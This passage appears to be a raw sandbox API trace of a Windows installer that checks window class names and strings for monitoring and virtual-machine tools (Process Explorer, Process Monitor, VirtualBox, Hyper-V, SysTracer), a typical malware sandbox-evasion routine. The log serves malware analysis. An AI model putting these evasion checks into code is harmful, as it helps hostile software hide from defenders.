iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.558] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.559] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.559] lstrcpynA (in: lpString1=0x3401e0, lpString2="", 
iMaxLength=1024 | out: lpString1="") returned="" [0158.559] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.559] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.559] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrlenA (lpString="0") returned 1 [0158.559] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.559] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.559] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.559] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.559] lstrlenA (lpString="0") returned 1 [0158.559] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.559] lstrlenA (lpString="") returned 0 [0158.560] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.560] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") 
returned="sysinternals" [0158.560] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.560] lstrlenA (lpString="3399936") returned 7 [0158.560] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.560] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.560] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.560] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.560] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.561] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.561] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrlenA (lpString="") returned 0 [0158.561] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrlenA (lpString="") returned 0 [0158.561] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrlenA (lpString="") returned 0 [0158.561] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.561] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.561] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.561] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.561] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.561] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.561] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.562] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.562] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.562] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.562] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.562] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.562] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.562] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.562] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.562] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.562] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.562] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.562] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.563] lstrcpynA (in: 
lpString1=0x340df8, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.563] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.563] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.563] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.563] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.563] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.563] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrlenA (lpString="0") returned 1 [0158.563] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.563] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.563] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.563] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.563] lstrlenA (lpString="0") returned 1 [0158.564] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.564] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.564] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.564] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.564] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.564] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.564] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.564] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.564] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") 
returned="3399936" [0158.564] lstrlenA (lpString="3399936") returned 7 [0158.564] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.564] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.564] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.564] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.565] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.565] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.565] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.565] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.565] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.565] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.565] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="131238") returned 6 [0158.565] lstrcpyA (in: lpString1=0x430400, lpString2="131238" | out: lpString1="131238") returned="131238" [0158.565] lstrcpynA (in: lpString1=0x3401e0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.565] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") 
returned="callback1" [0158.565] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.566] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.566] lstrlenA (lpString="callback1") returned 9 [0158.566] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.566] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.566] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.566] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.566] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.566] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.566] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.566] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.566] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.566] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.567] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.567] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.567] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.567] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.567] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.567] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.567] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.567] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.567] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.567] lstrcpynA (in: lpString1=0x341200, lpString2="131238", iMaxLength=1024 | out: lpString1="131238") 
returned="131238" [0158.567] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.567] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.568] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.568] GetWindowTextA (in: hWnd=0x200a6, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.568] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.568] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.568] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.568] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="131238") returned 6 [0158.568] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.568] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.568] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.568] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.568] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.568] lstrcpynA (in: lpString1=0x40b018, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.568] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.569] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.569] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.569] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.569] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.569] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.569] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.570] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.570] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.570] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" 
| out: lpString1="GetClassName") returned="GetClassName" [0158.570] lstrcpynA (in: lpString1=0x3401e0, lpString2="131238", iMaxLength=1024 | out: lpString1="131238") returned="131238" [0158.570] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.570] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.570] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.570] GetClassNameA (in: hWnd=0x200a6, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.570] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.570] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="131238") returned 6 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.571] lstrlenA (lpString="0") returned 1 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrlenA (lpString="tooltips_class32") returned 16 [0158.571] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.571] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: 
lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrlenA (lpString="tooltips_class32") returned 16 [0158.571] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.571] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrlenA (lpString="tooltips_class32") returned 16 [0158.571] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.571] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.571] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrlenA (lpString="tooltips_class32") returned 16 [0158.571] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.571] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.571] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.572] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") 
